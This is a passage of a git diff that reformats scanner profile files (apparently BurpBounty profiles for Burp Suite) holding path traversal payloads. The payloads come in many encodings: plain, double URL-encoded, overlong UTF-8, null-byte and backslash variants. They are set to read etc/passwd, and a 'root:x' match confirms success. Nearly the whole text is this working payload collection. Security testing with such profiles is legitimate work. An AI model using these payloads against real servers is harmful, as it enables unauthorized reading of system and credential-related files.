32%65%%32%65%%32%66{FILE}","%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x"],"Tags":["PathTraversal","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-Path","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[0],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-Path",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,.//..//{FILE}",
+ "true,.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",
+ "true,./../{FILE}",
+ "true,./.././../{FILE}",
+ "true,./.././.././.././../{FILE}",
+ "true,./.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././../{FILE}",
+ "true,./.././.././.././.././.././.././.././../{FILE}",
+ "true,..///{FILE}",
+ "true,..///..///{FILE}",
+ "true,..///..///..///{FILE}",
+ "true,..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///{FILE}",
+ "true,..///..///..///..///..///..///..///..///{FILE}",
+ "true,..//{FILE}",
+ "true,..//..//{FILE}",
+ "true,..//..//..//{FILE}",
+ "true,..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//{FILE}",
+ "true,..//..//..//..//..//..//..//..//{FILE}",
+ "true,../../{FILE}",
+ "true,../..//{FILE}",
+ "true,../..///{FILE}",
+ "true,../..//../{FILE}",
+ "true,../..//..///{FILE}",
+ "true,../..//../..//{FILE}",
+ "true,../..//../..///{FILE}",
+ "true,../..//../..//../{FILE}",
+ "true,../..//../..//..///{FILE}",
+ "true,../..//../..//../..//{FILE}",
+ "true,../..//../..//../..///{FILE}",
+ "true,../..//../..//../..//../{FILE}",
+ "true,../..//../..//../..//..///{FILE}",
+ "true,../..//../..//../..//../..//{FILE}",
+ "true,../..//../..//../..//../..///{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,../{FILE}%00.png",
+ "true,../../{FILE}%00.png",
+ "true,../../../{FILE}%00.png",
+ "true,../../../../{FILE}%00.png",
+ "true,../../../../../{FILE}%00.png",
+ "true,../../../../../../{FILE}%00.png",
+ "true,../../../../../../../{FILE}%00.png",
+ "true,../../../../../../../../{FILE}%00.png",
+ "true,....//{FILE}",
+ "true,....//....//{FILE}",
+ "true,....//....//....//{FILE}",
+ "true,....//....//....//....//{FILE}",
+ "true,....//....//....//....//....//{FILE}",
+ "true,....//....//....//....//....//....//{FILE}",
+ "true,....//....//....//....//....//....//....//{FILE}",
+ "true,....//....//....//....//....//....//....//....//{FILE}",
+ "true,....//....//....//....//....//....//....//....//....//{FILE}",
+ "true,....%2F%2F{FILE}",
+ "true,....%2F%2F....%2F%2F{FILE}",
+ "true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
+ "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
+ "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
+ "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
+ "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
+ "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
+ "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,root:x"
+ ],
+ "Tags": [
+ "PathTraversal",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-Path",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "etc/passwd",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 0
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-PathTraversal-MR.bb b/profiles/Linux-PathTraversal-MR.bb
old mode 100644
new mode 100755
index 198928d..7a63dc0
--- a/profiles/Linux-PathTraversal-MR.bb
+++ b/profiles/Linux-PathTraversal-MR.bb
@@ -1 +1,85 @@
-[{"Name":"Linux-PathTraversal-MR","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/../{FILE}","/../../{FILE}","/../../../{FILE}","/../../../../{FILE}","/../../../../../{FILE}","/../../../../../../{FILE}","/../../../../../../../{FILE}","/../../../../../../../../{FILE}","/..%2f{FILE}","/..%2f..%2f{FILE}","/..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-PathTraversal","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-PathTraversal-MR",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,/../{FILE}",
+ "true,/../../{FILE}",
+ "true,/../../../{FILE}",
+ "true,/../../../../{FILE}",
+ "true,/../../../../../{FILE}",
+ "true,/../../../../../../{FILE}",
+ "true,/../../../../../../../{FILE}",
+ "true,/../../../../../../../../{FILE}",
+ "true,/..%2f{FILE}",
+ "true,/..%2f..%2f{FILE}",
+ "true,/..%2f..%2f..%2f{FILE}",
+ "true,/..%2f..%2f..%2f..%2f{FILE}",
+ "true,/..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,root:x"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Linux-PathTraversal",
+ "IssueSeverity": "Medium",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Payload",
+ "match": "{FILE}",
+ "replace": "etc/passwd",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 65
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Linux-mysql-conf.bb b/profiles/Linux-mysql-conf.bb
index 70c2a39..c7308c7 100755
--- a/profiles/Linux-mysql-conf.bb
+++ b/profiles/Linux-mysql-conf.bb
@@ -1 +1,950 @@
-[{"Name":"Linux-mysql-conf","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","..%c0%af{FILE}","..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}","%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}","%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}","..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}","%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}","%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0